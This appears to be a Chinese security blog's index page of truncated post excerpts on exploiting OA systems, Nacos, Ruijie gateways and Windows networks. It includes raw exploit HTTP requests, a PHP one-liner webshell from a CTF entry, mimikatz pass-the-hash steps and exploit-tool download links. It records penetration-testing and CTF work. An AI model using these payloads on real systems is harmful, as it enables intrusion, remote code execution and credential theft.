打了一场护网遇到了好几个这样的环境,在这里记录一下绕过过程。【如下的为本地伪造环境】 目标系统E-Office v9 存在任意文件上传漏洞 首先需要绕过的是php的文...
WEB安全
Nacos 未授权访问
用户列表size代表用户数量 GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1 Host: x.x.x.x User-Agent: Nacos-Server Connection: close ...
常用java 利用工具
https://www.o2oxy.cn/wp-content/uploads/2021/01/Java利用工具.zip
锐捷网关系列通杀GetShell
https://github.com/Tas9er/EgGateWayGetShell 使用jd-gui 解开 整理出POC 如下: POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: ...
致远OA 任意文件上传
老版本 POST /seeyon/pdfservlet HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0 Accept: text/html,application...
内网hash 传递
首先通过mimikatz 抓取明文密码 mimikatz 1.通过wmiexec https://github.com/maaaaz/impacket-examples-windows python -m pip&nb...
通达OA 后台SQL 注入
POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1 Host: 10.211.55.5 Content-Length: 39 Accept: */* DNT: 1 X-Requested-With: XMLHttpRequest ...
Bugku INSERT INTO注入
<script language="php">@eval_r($_POST[sb])</script> 唔,学习了一波。 这道题目的去掉了, 不能用if(exp1,exp2,exp3)的方式。 然后我就恶补了一下 case when the...
python 后端WEB 上传漏洞 代码
昨天没事写了一个python的后端代码。作为任意上传的socket的连接 地址如下: http://good.o2oxy.cn 后端代码如下 import tornado.ioloop import tornado.web im...